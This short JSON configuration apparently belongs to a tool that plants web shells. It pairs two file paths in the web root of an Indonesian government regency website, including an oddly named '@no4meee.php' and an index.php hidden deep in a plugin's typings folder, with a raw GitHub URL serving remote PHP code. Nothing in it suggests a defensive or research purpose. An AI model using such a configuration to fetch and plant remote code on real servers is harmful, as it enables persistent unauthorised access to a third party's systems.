{
    "path": ["/home/mitrakabgo/public_html/ketapang.mitrakab.go.id/@no4meee.php", "/home/mitrakabgo/public_html/ketapang.mitrakab.go.id/templates/mitrakab/admin-lte/plugins/notify/bootstrap-notify-master/typings/bootstrap-notify/index.php"],
    "url": "https://raw.githubusercontent.com/eclibesec/hastalavista/refs/heads/main/index.php"
}
